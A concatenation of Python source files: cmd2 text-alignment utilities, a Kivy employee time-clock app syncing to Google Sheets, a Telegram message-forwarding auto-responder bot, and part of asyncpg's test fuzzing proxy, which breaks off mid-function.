left_fill += styled_space * (left_fill_width - ansi.style_aware_wcswidth(left_fill))
right_fill += styled_space * (right_fill_width - ansi.style_aware_wcswidth(right_fill))
# Don't allow styles in fill_char and text to affect one another
if fill_char_styles or aggregate_styles or line_styles:
if left_fill:
left_fill = ansi.RESET_ALL + left_fill
left_fill += ansi.RESET_ALL
if right_fill:
right_fill = ansi.RESET_ALL + right_fill
right_fill += ansi.RESET_ALL
# Write the line and restore any styles from previous lines
text_buf.write(left_fill + aggregate_styles + line + right_fill)
# Update the aggregate with styles in this line
aggregate_styles += ''.join(line_styles.values())
return text_buf.getvalue()
def align_left(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Left align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to left align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: left-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.LEFT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_center(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Center text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to center (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: centered text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.CENTER, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_right(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Right align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to right align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: right-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.RIGHT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def truncate_line(line: str, max_width: int, *, tab_width: int = 4) -> str:
"""
Truncate a single line to fit within a given display width. Any portion of the string that is truncated
is replaced by a '…' character. Supports characters with display widths greater than 1. ANSI style sequences
do not count toward the display width.
If there are ANSI style sequences in the string after where truncation occurs, this function will append them
to the returned string.
This is done to prevent issues caused in cases like: truncate_string(fg.blue + hello + fg.reset, 3)
In this case, "hello" would be truncated before fg.reset resets the color from blue. Appending the remaining style
sequences makes sure the style is in the same state had the entire string been printed. align_text() relies on this
behavior when preserving style over multiple lines.
:param line: text to truncate
:param max_width: the maximum display width the resulting string is allowed to have
:param tab_width: any tabs in the text will be replaced with this many spaces
:return: line that has a display width less than or equal to width
:raises: ValueError if text contains an unprintable character like a newline
:raises: ValueError if max_width is less than 1
"""
import io
from . import (
ansi,
)
# Handle tabs
line = line.replace('\t', ' ' * tab_width)
if ansi.style_aware_wcswidth(line) == -1:
raise (ValueError("text contains an unprintable character"))
if max_width < 1:
raise ValueError("max_width must be at least 1")
if ansi.style_aware_wcswidth(line) <= max_width:
return line
# Find all style sequences in the line
styles = get_styles_in_text(line)
# Add characters one by one and preserve all style sequences
done = False
index = 0
total_width = 0
truncated_buf = io.StringIO()
while not done:
# Check if a style sequence is at this index. These don't count toward display width.
if index in styles:
truncated_buf.write(styles[index])
style_len = len(styles[index])
styles.pop(index)
index += style_len
continue
char = line[index]
char_width = ansi.style_aware_wcswidth(char)
# This char will make the text too wide, add the ellipsis instead
if char_width + total_width >= max_width:
char = constants.HORIZONTAL_ELLIPSIS
char_width = ansi.style_aware_wcswidth(char)
done = True
total_width += char_width
truncated_buf.write(char)
index += 1
# Append remaining style sequences from original string
truncated_buf.write(''.join(styles.values()))
return truncated_buf.getvalue()
def get_styles_in_text(text: str) -> Dict[int, str]:
"""
Return an OrderedDict containing all ANSI style sequences found in a string
The structure of the dictionary is:
key: index where sequences begins
value: ANSI style sequence found at index in text
Keys are in ascending order
:param text: text to search for style sequences
"""
from . import (
ansi,
)
start = 0
styles = collections.OrderedDict()
while True:
match = ansi.ANSI_STYLE_RE.search(text, start)
if match is None:
break
styles[match.start()] = match.group()
start += len(match.group())
return styles
def categorize(func: Union[Callable[..., Any], Iterable[Callable[..., Any]]], category: str) -> None:
"""Categorize a function.
The help command output will group the passed function under the
specified category heading
:param func: function or list of functions to categorize
:param category: category to put it in
:Example:
>>> import cmd2
>>> class MyApp(cmd2.Cmd):
>>> def do_echo(self, arglist):
>>> self.poutput(' '.join(arglist)
>>>
>>> cmd2.utils.categorize(do_echo, "Text Processing")
For an alternative approach to categorizing commands using a decorator, see
:func:`~cmd2.decorators.with_category`
"""
if isinstance(func, Iterable):
for item in func:
setattr(item, constants.CMD_ATTR_HELP_CATEGORY, category)
else:
if inspect.ismethod(func):
setattr(func.__func__, constants.CMD_ATTR_HELP_CATEGORY, category) # type: ignore[attr-defined]
else:
setattr(func, constants.CMD_ATTR_HELP_CATEGORY, category)
def get_defining_class(meth: Callable[..., Any]) -> Optional[Type[Any]]:
"""
Attempts to resolve the class that defined a method.
Inspired by implementation published here:
https://stackoverflow.com/a/25959545/1956611
:param meth: method to inspect
:return: class type in which the supplied method was defined. None if it couldn't be resolved.
"""
if isinstance(meth, functools.partial):
return get_defining_class(meth.func)
if inspect.ismethod(meth) or (
inspect.isbuiltin(meth)
and getattr(meth, '__self__') is not None
and getattr(meth.__self__, '__class__') # type: ignore[attr-defined]
):
for cls in inspect.getmro(meth.__self__.__class__): # type: ignore[attr-defined]
if meth.__name__ in cls.__dict__:
return cls
meth = getattr(meth, '__func__', meth) # fallback to __qualname__ parsing
if inspect.isfunction(meth):
cls = getattr(inspect.getmodule(meth), meth.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0])
if isinstance(cls, type):
return cls
return cast(type, getattr(meth, '__objclass__', None)) # handle special descriptor objects
class CompletionMode(Enum):
"""Enum for what type of tab completion to perform in cmd2.Cmd.read_input()"""
# Tab completion will be disabled during read_input() call
# Use of custom up-arrow history supported
NONE = 1
# read_input() will tab complete cmd2 commands and their arguments
# cmd2's command line history will be used for up arrow if history is not provided.
# Otherwise use of custom up-arrow history supported.
COMMANDS = 2
# read_input() will tab complete based on one of its following parameters:
# choices, choices_provider, completer, parser
# Use of custom up-arrow history supported
CUSTOM = 3
class CustomCompletionSettings:
"""Used by cmd2.Cmd.complete() to tab complete strings other than command arguments"""
def __init__(self, parser: argparse.ArgumentParser, *, preserve_quotes: bool = False):
"""
Initializer
:param parser: arg parser defining format of string being tab completed
:param preserve_quotes: if True, then quoted tokens will keep their quotes when processed by
ArgparseCompleter. This is helpful in cases when you're tab completing
flag-like tokens (e.g. -o, --option) and you don't want them to be
treated as argparse flags when quoted. Set this to True if you plan
on passing the string to argparse with the tokens still quoted.
"""
self.parser = parser
self.preserve_quotes = preserve_quotes
|
main.py
|
from kivy.app import App
import config
import datetime
import time
import threading
import pprint
from operator import itemgetter
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from kivy.storage.jsonstore import JsonStore
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.properties import ObjectProperty, StringProperty, NumericProperty, BooleanProperty
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.recycleview import RecycleView
from kivy.uix.recycleview.views import RecycleDataViewBehavior
from kivy.uix.popup import Popup
# Helper Functions
pp = pprint.PrettyPrinter(indent=4)
# String to Boolean
def str2bool(s):
return s.lower() in ['true', 'yes']
# Boolean to String
def bool2str(b):
if b:
return "TRUE"
else:
return "FALSE"
# Weekday Array
Weekday = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
# Column Array
col = {'employeeNo' : 'A' ,'name' : 'B' ,'surname' : 'C' ,'active' : 'D' ,'signedIn' : 'E' ,'timeIn' : 'F' ,'timeOut' : 'G', 'normalHours' : 'H' }
# Employee Popup
class EmployeePopup(Popup):
# POPUP for displaying the controls for the employee sign in or sign out.
greeting = StringProperty()
message = StringProperty()
def __init__(self, employee, **kwargs):
self.employee = employee
if self.employee.signedIn:
self.greeting = "Goodbye, {} {}.".format(self.employee.name, self.employee.surname)
self.message = "Do you want to SIGN OUT? You signed in at " + self.employee.time_in_string
else:
self.greeting = "Hello, {} {}.".format(self.employee.name, self.employee.surname)
self.message = "Do you want to SIGN IN?"
super(EmployeePopup, self).__init__(**kwargs)
def logEmployee(self):
self.dismiss()
if (self.employee.signedIn):
self.employee.save_logout(self.employee)
else:
self.employee.save_login(self.employee)
# Employee List
class EmployeeList(RecycleView):
googleFile = "Employee Data"
dirtyRecords = []
threadRunning = False
def __init__(self, **kwargs):
# Get employee details from google and populate the app. If unable to connect,
# get the details from local storage.
# TODO: Check that the last saved version from google is the same as the local storage.
super(EmployeeList, self).__init__(**kwargs)
connected = True
employees = []
failedAttempts = 0
# Try to open the google worksheet to load employee data.
try:
employeeSheet = self.get_google_sheet(config.GOOGLE_CONFIG['employeeSheet'])
except:
print "Error connecting to the google server"
connected = False
if connected:
# Get employees from google and sort into alphabetical order (by Surname)
employeeImport = employeeSheet.get_all_records()
# Create local storage for the employees
store = JsonStore('employees.json')
for e in store:
store.delete(e)
for e in employeeImport :
# Convert yes/no fields to bool. Remove inactive users.
e['active'] = str2bool(e['active'])
if e['active']:
e['signedIn'] = str2bool(e['signedIn'])
# Add employee to local storage.
store.put(
e['employeeNo'],
name=e['name'],
surname=e['surname'],
signedIn=e['signedIn'],
timeIn=e['timeIn'],
timeOut=e['timeOut']
)
# Convert time string to datetime objects
if e['timeIn'] != "":
e['timeIn'] = datetime.datetime.strptime(e['timeIn'], "%Y-%m-%d %X")
if e['timeOut'] != "":
e['timeOut'] = datetime.datetime.strptime(e['timeOut'], "%Y-%m-%d %X")
# Create the data clean element
e['clean'] = True
# Add record to the employees
employees.append(e)
else:
# If the employee is inactive, remove from the list.
# employees.remove(e)
print "{} {} is DELETED".format(e['name'], e['surname'])
else:
# If unable to connect to google server, connect to local.
print('Failed to connect to Google Server')
store = JsonStore('employees.json')
for e in store:
# Check and convert time
if store.get(e)['timeIn'] != "":
timeInString = datetime.datetime.strptime(store.get(e)['timeIn'], "%Y-%m-%d %X")
else:
timeInString = ""
if store.get(e)['timeOut'] != "":
timeOutString = datetime.datetime.strptime(store.get(e)['timeOut'], "%Y-%m-%d %X")
else:
timeOutString = ""
# Generate entry
entry = {
'employeeNo': e,
'name': store.get(e)['name'],
'surname': store.get(e)['surname'],
'signedIn': store.get(e)['signedIn'],
'timeIn': timeInString,
'timeOut': timeOutString,
}
employees.append(entry)
# Sort employee and set data
self.data = sorted(employees, key=itemgetter('surname'))
# Log employee In
def log_employee_in(self, employee):
self.data[employee]['signedIn'] = True
self.data[employee]['timeIn'] = datetime.datetime.now()
self.data[employee]['timeOut'] = {}
self.refresh_from_data()
# Save data
# Connect to store
store = JsonStore('employees.json')
record = str(self.data[employee]['employeeNo'])
timeIn = self.data[employee]['timeIn'].strftime("%Y-%m-%d %X")
timeOut = ""
signedIn = True
if store.exists(record):
# store[record]['timeIn'] = str(self.data[employee]['timeIn'])
store[record]['timeIn'] = timeIn
store[record]['timeOut'] = timeOut
store[record]['signedIn'] = signedIn
store[record] = store[record]
else:
print "Unable to connect to local storage"
# Create a dirty flag
dirtyFlag = {
'index': employee,
'employeeNo': record,
'signedIn' : signedIn,
'timeIn' : timeIn,
'timeOut' : timeOut
}
# Mark the record as dirty so that it is uploaded to the Google servers.
# Do not add if already waiting for upload.
if dirtyFlag not in self.dirtyRecords:
self.dirtyRecords.append(dirtyFlag)
print str(len(self.dirtyRecords))
# Log employee Out
def log_employee_out(self, employee):
self.data[employee]['signedIn'] = False
self.data[employee]['timeOut'] = datetime.datetime.now()
#pp.pprint(self.data)
self.refresh_from_data()
# Connect to jsonstore
store = JsonStore('employees.json')
# # Check if the record exists
record = str(self.data[employee]['employeeNo'])
timeIn = self.data[employee]['timeIn'].strftime("%Y-%m-%d %X")
timeOut = self.data[employee]['timeOut'].strftime("%Y-%m-%d %X")
signedIn = False
if store.exists(record):
store[record]['timeOut'] = self.data[employee]['timeOut'].strftime("%Y-%m-%d %X")
store[record]['signedIn'] = False
store[record] = store[record]
else:
print "Unable to connect to local storage"
# Create a dirty flag
dirtyFlag = {
'index': employee,
'employeeNo': record,
'signedIn' : signedIn,
'timeIn' : timeIn,
'timeOut' : timeOut
}
# Mark the record as dirty so that it is uploaded to the Google servers.
# Do not add if already waiting for upload.
if dirtyFlag not in self.dirtyRecords:
self.dirtyRecords.append(dirtyFlag)
print self.dirtyRecords
print str(len(self.dirtyRecords))
# GOOGLE SHEET FUNCTIONS
# ----------------------
# Connect to google sheet
def get_google_sheet(self, worksheetName):
scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name(config.GOOGLE_CONFIG['clientSecretFile'], scope)
client = gspread.authorize(creds)
sheet = client.open(config.GOOGLE_CONFIG['fileName']).worksheet(worksheetName)
return sheet
# Update employee list
def update_employee_list(self):
# Check to see if there are any records that need updating
if len(self.dirtyRecords) > 0 and not self.threadRunning:
self.threadRunning = True
print "Thread running"
# Get first record from the list
employee = self.dirtyRecords.pop(0)
# Get record data for the employee
employeeNo = employee['employeeNo']
state = employee['signedIn']
timeIn = employee['timeIn']
timeOut = employee['timeOut']
print "Updating Data for Employee: {}, Time In: {}, Time Out: {}.".format(employeeNo, timeIn, timeOut)
try:
sheet = self.get_google_sheet(config.GOOGLE_CONFIG['employeeSheet'])
e = sheet.find(str(employeeNo))
pp.pprint(employeeNo)
# Update SignedIn state
print str(state)
sheet.update_acell(col['signedIn'] + str(e.row), bool2str(state))
# Update timeIn state
print timeIn
sheet.update_acell(col['timeIn'] + str(e.row), str(timeIn))
# Update timeOut state
print timeOut
sheet.update_acell(col['timeOut'] + str(e.row), str(timeOut))
except:
print "Unable to connect with Google Employee Sheet"
# Check if the record is a complete record with signIn and signOut
if timeOut:
# Add the record to the Google Sheet
try:
print "Trying to upload"
hoursSheet = self.get_google_sheet(config.GOOGLE_CONFIG['hoursSheet'])
hoursSheet.append_row([str(employeeNo), str(timeIn), str(timeOut)])
except:
"Unable to connect with Google Hours Sheet"
if employee not in self.dirtyRecords:
self.dirtyRecords.append(employee)
else:
print "Upload successful."
self.threadRunning = False
print "Thread Ending"
# Employee View
class EmployeeView(RecycleDataViewBehavior, BoxLayout):
index = None
employeeNo = ObjectProperty()
name = StringProperty()
surname = StringProperty()
active = BooleanProperty()
signedIn = BooleanProperty()
timeIn = ObjectProperty()
timeOut= ObjectProperty()
normalHours = ObjectProperty()
time_in_string = StringProperty()
time_out_string = StringProperty()
clean = BooleanProperty()
pressed = BooleanProperty()
def __init__(self, **kwargs):
super(EmployeeView, self).__init__(**kwargs)
self.pressed = False
# Functions for calculating the string version of the time variables
self.bind(timeIn=self.get_time_in_string)
self.bind(timeOut=self.get_time_out_string)
def refresh_view_attrs(self, rv, index, data):
''' Catch and handle the view changes '''
self.index = index
self.data = data
return super(EmployeeView, self).refresh_view_attrs(
rv, index, data)
def get_time_out_string(self, instance, value):
# Function bound to the timeOut variable to automatically calculate string
#DEBUG print "Recalculated time out string"
if isinstance(self.timeOut, datetime.datetime):
self.time_out_string = self.timeOut.strftime("%H:%M")
self.data['timeOut'] = self.timeOut
else:
self.data['timeOut'] = {}
self.time_out_string = "N/A"
def get_time_in_string(self, instance, value):
# Function bound to the timeIn variable to automatically calculate string.
#DEBUG print "Recalculated time in string"
if isinstance(self.timeIn, datetime.datetime):
self.time_in_string = self.timeIn.strftime("%H:%M")
self.data['timeIn'] = self.timeIn
else:
self.data['timeIn'] = {}
self.time_in_string = "N/A"
def on_touch_down(self, touch):
if self.collide_point(*touch.pos):
self.pressed = True
def on_touch_up(self, touch):
if self.collide_point(*touch.pos):
self.pressed = False
popup = EmployeePopup(self)
popup.open()
def save_login(self, employee):
# Pass action to the EmployeeList class
self.parent.parent.log_employee_in(self.index)
def save_logout(self, employee):
# Pass action to the EmployeeList class
self.parent.parent.log_employee_out(self.index)
def getDayOfWeek(dateString):
t1 = time.strptime(dateString, "%m/%d/%Y")
t2 = time.mktime(t1)
return (time.localtime(t2)[6])
class ClockWidget(BoxLayout):
uxTime = StringProperty('')
uxSeconds = StringProperty('')
uxDate = StringProperty('')
uxDay = StringProperty('')
def update(self, dt):
self.uxTime = time.strftime("%H:%M", time.localtime())
self.uxSeconds = time.strftime("%S", time.localtime())
self.uxDate = time.strftime("%d %B %Y", time.localtime())
self.uxDay = Weekday[getDayOfWeek(time.strftime("%m/%d/%Y", time.localtime()))]
# Update the Employee List
employeeList = App.get_running_app().employeeList
threading.Thread(target=employeeList.update_employee_list).start()
class TimeApp(App):
employeeList = EmployeeList()
def build(self):
clockWidget = ClockWidget()
Clock.schedule_interval(clockWidget.update, 1)
return clockWidget
if __name__ == '__main__':
TimeApp().run()
|
main.py
|
# -*- coding: utf-8 -*-
import datetime
import socket
import logging
import os
import pprint # noqa
import string
import threading
import time
from pytg.utils import coroutine
from pytg.receiver import Receiver
from pytg.sender import Sender
from pytg.exceptions import ConnectionError
from storage import Storage
MESSAGES = (
'new',
'idle',
)
TB_TG_HOST = os.environ.get('TB_TG_HOST', 'localhost') # telegram cli host
TB_TG_PORT = int(os.environ.get('TB_TG_PORT', 4458)) # telegram cli port
TB_LOGLEVEL = getattr(logging, os.environ.get('TB_LOGLEVEL', '').upper(), 'INFO')
TB_INTERVAL_RESPONSE_IDLE_DIALOG = int(os.environ.get('TB_INTERVAL_RESPONSE_IDLE_DIALOG', 3 * 60))
TB_UPDATE_DIALOG_LIST_INTERVAL = int(os.environ.get('TB_UPDATE_DIALOG_LIST_INTERVAL', 5))
TB_UPDATE_CONTACTS_LIST_INTERVAL = int(os.environ.get('TB_UPDATE_CONTACTS_LIST_INTERVAL', 9))
_TB_FORWARD_USERS = filter(bool, map(string.strip, os.environ.get('TB_FORWARD_USERS', '').split(','))) # the target users fo rforwarding messages
_TB_FORWARD_USERS = map(lambda x: x.decode('utf-8'), _TB_FORWARD_USERS)
TB_MESSAGES_DIRECTORY = os.environ.get('TB_MESSAGES_DIRECTORY', None)
log_format = logging.Formatter('[%(levelname)5s] %(asctime)s: %(msg)s (%(module)s.%(funcName)s:%(lineno)d)')
log = logging.getLogger(__name__)
log.setLevel(TB_LOGLEVEL)
st = logging.StreamHandler()
st.setFormatter(log_format)
log.addHandler(st)
STORAGE = Storage(os.path.join(os.environ.get('HOME'), '.telegram-cli'))
RECEIVER = SENDER = None
DATA = dict()
if STORAGE.get('f', None) is None:
STORAGE.set('f', dict())
if STORAGE.get('d', None) is None:
STORAGE.set('d', dict())
def connect():
global RECEIVER, SENDER
log.debug('> trying to connect: %s:%s' % (TB_TG_HOST, TB_TG_PORT))
RECEIVER = Receiver(host=TB_TG_HOST, port=TB_TG_PORT)
SENDER = Sender(host=TB_TG_HOST, port=TB_TG_PORT)
RECEIVER.start()
log.debug('< connected')
return
def with_connection(f):
def w(*a, **kw):
while True:
try:
return f(*a, **kw)
except (socket.gaierror, ConnectionError):
time.sleep(1)
connect()
return w
def is_forward_user(o):
if o.get('username') in _TB_FORWARD_USERS:
return True
if o.get('print_name') in _TB_FORWARD_USERS:
return True
if o.get('id') in _TB_FORWARD_USERS:
return True
if o.get('phone') in _TB_FORWARD_USERS:
return True
return False
def _update_contact_list():
log.debug('> trying to update contacts list')
if 'contacts' not in DATA:
DATA['contacts'] = list()
try:
l = SENDER.contacts_list()
except TypeError:
return
DATA['contacts'] = l
found_forward_user = filter(is_forward_user, DATA['contacts'])
tb_forward_users = STORAGE.get('f', dict())
for k, v in tb_forward_users.items():
if v.get('_type') not in ('contact',):
continue
if True not in filter(lambda x: k == x.get('id'), found_forward_user):
del tb_forward_users[k]
for i in found_forward_user:
if i.get('id') not in tb_forward_users:
i['_type'] = 'contact'
tb_forward_users[i.get('id')] = i
log.debug('< updated contacts list')
STORAGE.set('f', tb_forward_users)
log.debug('< forwarded users: %s' % STORAGE.get('f'))
return
def update_contact_list():
log.debug('> trying to update contacts list')
while True:
try:
_update_contact_list()
except TypeError:
pass
time.sleep(TB_UPDATE_CONTACTS_LIST_INTERVAL)
return
def _update_dialog_list():
log.debug('> trying to update dialog list')
dialogs = dict()
found = list()
found_forward_user = list()
for i in SENDER.dialog_list():
if is_forward_user(i):
found_forward_user.append(i)
if i.get('type') not in ('user',):
continue
p = i.get('phone')
found.append(p)
if p not in dialogs:
dialogs[p] = i
tb_forward_users = STORAGE.get('f', dict())
for k, v in tb_forward_users.items():
if v.get('_type') not in ('dialog',):
continue
if True not in filter(lambda x: k == x.get('id'), found_forward_user):
del tb_forward_users[k]
for i in found_forward_user:
if i.get('id') not in tb_forward_users:
i['_type'] = 'dialog'
tb_forward_users[i.get('id')] = i
log.debug('< updated dialog list')
STORAGE.set('f', tb_forward_users)
log.debug('< forwarded users: %s' % STORAGE.get('f'))
return
def update_dialog_list():
while True:
try:
_update_dialog_list()
except TypeError:
pass
time.sleep(TB_UPDATE_DIALOG_LIST_INTERVAL)
return
def forward(msg):
for i in STORAGE.get('f', dict()).values():
SENDER.fwd(i.get('print_name'), msg.get('id'))
return
def _watch_dialogs():
found = dict()
for k, v in STORAGE.get('d').items():
updated = v.get('_updated')
if updated is None:
continue
suplus = updated + TB_INTERVAL_RESPONSE_IDLE_DIALOG
if time.time() < suplus:
continue
found[k] = v
if not found:
return
# load message
messages = dict()
for i in MESSAGES:
message_file = os.path.join(TB_MESSAGES_DIRECTORY, '%s.txt' % i)
if not os.path.isfile(message_file):
continue
messages[i] = file(message_file).read().strip()
# send message
for k, v in found.items():
# set message type
if v['_updated'] == v.get('_created'):
message_type = 'new'
else:
message_type = 'idle'
message = messages.get(message_type)
if not message:
continue
SENDER.send_msg(v.get('cmd'), message.decode('utf-8'))
d = STORAGE.get('d')
d[k]['_updated'] = None
STORAGE.set('d', d)
return
def watch_dialogs():
while True:
time.sleep(2)
_watch_dialogs()
return
@coroutine
def handle_messages(*a, **kw):
try:
while True:
msg = yield
if msg.event in ('online-status',):
continue
when = None
if hasattr(msg, 'date'):
when = datetime.datetime.fromtimestamp(msg.date)
elif hasattr(msg, 'when'):
when = datetime.datetime.strptime(msg.when, '%Y-%m-%d %H:%M:%S')
if msg.event not in ('message',):
continue
if hasattr(msg, 'peer') and msg.peer is None: # owner message
continue
if hasattr(msg, 'sender') and msg.sender is not None and msg.sender.get('username') == DATA['me'].get('username'): # me
continue
log.debug('got message: %s [%s]: %s' % (when, msg.event, msg))
SENDER.mark_read(msg.peer.cmd)
SENDER.mark_read(msg.receiver.cmd)
now = time.time()
o = msg.sender.copy()
if msg.sender.cmd not in STORAGE.get('d'):
o['_created'] = now
o['_updated'] = now
d = STORAGE.get('d')
d[msg.sender.cmd] = o
STORAGE.set('d', d)
forward(msg)
except GeneratorExit:
pass
except KeyboardInterrupt:
RECEIVER.stop()
log.info("exiting")
def run():
with_connection(connect)()
DATA['me'] = SENDER.get_self()
contacts_list_thread = threading.Thread(name="contacts", target=with_connection(update_contact_list), args=())
contacts_list_thread.daemon = True
contacts_list_thread.start()
dialog_list_thread = threading.Thread(name="dialogs", target=with_connection(update_dialog_list), args=())
dialog_list_thread.daemon = True
dialog_list_thread.start()
watch_dialogs_thread = threading.Thread(name="watch dialog", target=with_connection(watch_dialogs), args=())
watch_dialogs_thread.daemon = True
watch_dialogs_thread.start()
RECEIVER.start() # start the Connector.
RECEIVER.message(with_connection(handle_messages)(RECEIVER))
|
fuzzer.py
|
# Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import asyncio
import socket
import threading
import typing
from asyncpg import cluster
class StopServer(Exception):
pass
class TCPFuzzingProxy:
def __init__(self, *, listening_addr: str='127.0.0.1',
listening_port: typing.Optional[int]=None,
backend_host: str, backend_port: int,
settings: typing.Optional[dict]=None) -> None:
self.listening_addr = listening_addr
self.listening_port = listening_port
self.backend_host = backend_host
self.backend_port = backend_port
self.settings = settings or {}
self.loop = None
self.connectivity = None
self.connectivity_loss = None
self.stop_event = None
self.connections = {}
self.sock = None
self.listen_task = None
async def _wait(self, work):
work_task = asyncio.ensure_future(work)
stop_event_task = asyncio.ensure_future(self.stop_event.wait())
try:
await asyncio.wait(
[work_task, stop_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.stop_event.is_set():
raise StopServer()
else:
return work_task.result()
finally:
if not work_task.done():
work_task.cancel()
if not stop_event_task.done():
stop_event_task.cancel()
def start(self):
started = threading.Event()
self.thread = threading.Thread(
target=self._start_thread, args=(started,))
self.thread.start()
if not started.wait(timeout=2):
raise RuntimeError('fuzzer proxy failed to start')
def stop(self):
self.loop.call_soon_threadsafe(self._stop)
self.thread.join()
def _stop(self):
self.stop_event.set()
def _start_thread(self, started_event):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.connectivity = asyncio.Event()
self.connectivity.set()
self.connectivity_loss = asyncio.Event()
self.stop_event = asyncio.Event()
if self.listening_port is None:
self.listening_port = cluster.find_available_port()
self.sock = socket.socket()
self.sock.bind((self.listening_addr, self.listening_port))
self.sock.listen(50)
self.sock.setblocking(False)
try:
self.loop.run_until_complete(self._main(started_event))
finally:
self.loop.close()
async def _main(self, started_event):
self.listen_task = asyncio.ensure_future(self.listen())
# Notify the main thread that we are ready to go.
started_event.set()
try:
await self.listen_task
finally:
for c in list(self.connections):
c.close()
await asyncio.sleep(0.01)
if hasattr(self.loop, 'remove_reader'):
self.loop.remove_reader(self.sock.fileno())
self.sock.close()
async def listen(self):
while True:
try:
client_sock, _ = await self._wait(
self.loop.sock_accept(self.sock))
backend_sock = socket.socket()
backend_sock.setblocking(False)
await self._wait(self.loop.sock_connect(
backend_sock, (self.backend_host, self.backend_port)))
except StopServer:
break
conn = Connection(client_sock, backend_sock, self)
conn_task = self.loop.create_task(conn.handle())
self.connections[conn] = conn_task
def trigger_connectivity_loss(self):
self.loop.call_soon_threadsafe(self._trigger_connectivity_loss)
def _trigger_connectivity_loss(self):
self.connectivity.clear()
self.connectivity_loss.set()
def restore_connectivity(self):
self.loop.call_soon_threadsafe(self._restore_connectivity)
def _restore_connectivity(self):
self.connectivity.set()
self.connectivity_loss.clear()
def reset(self):
self.restore_connectivity()
def _close_connection(self, connection):
conn_task = self.connections.pop(connection, None)
if conn_task is not None:
conn_task.cancel()
def close_all_connections(self):
for conn in list(self.connections):
self.loop.call_soon_threadsafe(self._close_connection, conn)
class Connection:
def __init__(self, client_sock, backend_sock, proxy):
self.client_sock = client_sock
self.backend_sock = backend_sock
self.proxy = proxy
self.loop = proxy.loop
self.connectivity = proxy.connectivity
self.connectivity_loss = proxy.connectivity_loss
self.proxy_to_backend_task = None
self.proxy_from_backend_task = None
self.is_closed = False
def close(self):
if self.is_closed:
return
self.is_closed = True
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
self.proxy_to_backend_task = None
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
self.proxy_from_backend_task = None
self.proxy._close_connection(self)
async def handle(self):
self.proxy_to_backend_task = asyncio.ensure_future(
self.proxy_to_backend())
self.proxy_from_backend_task = asyncio.ensure_future(
self.proxy_from_backend())
try:
await asyncio.wait(
[self.proxy_to_backend_task, self.proxy_from_backend_task],
return_when=asyncio.FIRST_COMPLETED)
finally:
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
# Asyncio fails to properly remove the readers and writers
# when the task doing recv() or send() is cancelled, so
# we must remove the readers and writers manually before
# closing the sockets.
self.loop.remove_reader(self.client_sock.fileno())
self.loop.remove_writer(self.client_sock.fileno())
self.loop.remove_reader(self.backend_sock.fileno())
self.loop.remove_writer(self.backend_sock.fileno())
self.client_sock.close()
self.backend_sock.close()
async def _read(self, sock, n):
read_task = asyncio.ensure_future(
self.loop.sock_recv(sock, n))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[read_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return read_task.result()
finally:
if not self.loop.is_closed():
if not read_task.done():
read_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def _write(self, sock, data):
write_task = asyncio.ensure_future(
